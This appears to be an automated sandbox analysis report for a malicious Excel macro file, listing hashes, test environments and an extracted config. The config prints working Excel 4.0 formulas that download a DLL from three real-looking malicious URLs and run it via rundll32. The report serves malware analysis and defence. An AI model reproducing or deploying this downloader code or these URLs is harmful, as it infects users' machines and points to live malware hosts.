General
-
Target
?i=1biefmipt
-
Size
83KB
-
Sample
220522-f58n8abbhk
-
MD5
9025de21ff8b4c4f735ed9dceff32cad
-
SHA1
56ea6fd825d8790562107b9a93576cd715d5d21a
-
SHA256
44b990e0cecfdbce9a3071b4b5a23cb9bfd7fbccb6fb5eb267b229a822c932b0
-
SHA512
8cbbb6f9bb1728ac132e66eabb9dc31ce6b2aba861868cdac844ad9c101672c667b2a00c920dd1254c0c945dc1595eb26953592482a0ae255f27192c3e8c2bfe
Behavioral task
behavioral1
Sample
?i=1biefmipt.xlsm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
?i=1biefmipt.xlsm
Resource
win10v2004-20220414-en
Malware Config
Extracted
http://recont.com/n8xbqb/lwEORjcJYPKCNQ/
http://dichnghiatienganh.com/jvmqawn/2mdbSTjM1Lg/
https://www.moharrampartners.com/requestion/wiA/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://recont.com/n8xbqb/lwEORjcJYPKCNQ/","..\erum.ocx",0,0) =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dichnghiatienganh.com/jvmqawn/2mdbSTjM1Lg/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.moharrampartners.com/requestion/wiA/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()
Extracted
http://recont.com/n8xbqb/lwEORjcJYPKCNQ/
http://dichnghiatienganh.com/jvmqawn/2mdbSTjM1Lg/
https://www.moharrampartners.com/requestion/wiA/
Targets
-
-
Target
?i=1biefmipt
-
Size
83KB
-
MD5
9025de21ff8b4c4f735ed9dceff32cad
-
SHA1
56ea6fd825d8790562107b9a93576cd715d5d21a
-
SHA256
44b990e0cecfdbce9a3071b4b5a23cb9bfd7fbccb6fb5eb267b229a822c932b0
-
SHA512
8cbbb6f9bb1728ac132e66eabb9dc31ce6b2aba861868cdac844ad9c101672c667b2a00c920dd1254c0c945dc1595eb26953592482a0ae255f27192c3e8c2bfe
Score10/10 -